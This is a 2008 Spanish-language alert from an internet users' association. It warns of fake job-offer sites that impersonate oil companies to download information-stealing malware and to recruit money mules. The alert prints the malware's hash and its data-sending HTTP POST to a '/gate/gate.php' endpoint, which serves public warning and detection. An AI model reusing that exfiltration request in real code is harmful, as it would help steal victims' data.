Conocíamos variantes de phishing con malware, felicitaciones con malware, pero los delincuentes dan otra vuelta mas de tuerca y esta vez realizan ofertas falsas de trabajo (scam) que contienen malware para obtener información de las victimas.
11-05-2008 - La Comisión de Seguridad de la Asociación de Internautas lleva varios días analizando distintas web preparadas para realizar un ataque de scam donde usan la imagen de distintas petroleras y donde se esta detectando una nueva combinación de ofertas falsas de trabajo junto a malware para robar información de las victimas de esta trampa.
Hace unos días alertábamos de varias webs falsas que simulan petroleras y hospitales, entre ellas se encontraba la petrolera española-argentina: Repsol-YPF ,afortunadamente estas webs fueron cerradas tras el aviso de la Comisión de Seguridad de la Asociación de Internautas, pero tras esta nueva investigación se puede comprobar que los delincuentes están preparados para un nuevo ataque a gran escala, recordamos que la campaña de hacienda acaba de iniciarse y estas variantes con contenido malware también pueden ser usadas para distintos ataques, por ellos no debemos bajar la guardia.
Una de las web detectadas para realizar ofertas falsas de trabajo y que descarga malware simula a una petrolera:
Si la victima visita la web fraudulenta se produce la descarga de archivo:
Características del malware:
606.208 bytes
md5: e2fe92ac73c965050f2488e6ca0a8609
Cuando se ejecuta el fichero en la maquina de la victima este se conecta a un servidor para enviar información obtenida de la victima :
POST /gate/gate.php
Content-Type: application/x-www-form-urlencoded
a=x-fan@list.ru&b=Pass&d=report&c=
La información es enviada a una lista de distribución: a=x-fan@list.ru
Desde la Asociación de Internautas queremos alertar de este tipo de ofertas FALSAS de trabajo, no bajen la guardia y recuerden que ya no hay chollos.
¿Que es el Scam?
El Scam es la captación de personas por medio de correos electrónicos, chats, irc, etc... donde empresas ficticias le ofrecen trabajar cómodamente desde casa y cobrando unos beneficios muy altos. Sin saberlo, la víctima esta blanqueando dinero obtenido por medio del phishing (procedente de estafas bancarias).
Recuerde que la Asociación de Internautas cuenta con un servicio donde pueden denunciar este tipo de intento de estafa, no dude en denunciar, entre todos podemos erradicar este tipo de engaños.
Dirección electrónica donde nos puede enviar datos de una posible estafa de Scam;
phishing@internautas.org
Comisión de Seguridad en la Red.
José María Luque Guerrero
http://seguridad.internautas.org -
www.seguridadenlared.org -
www.seguridadpymes.es
Asociación de Internautas.
www.internautas.org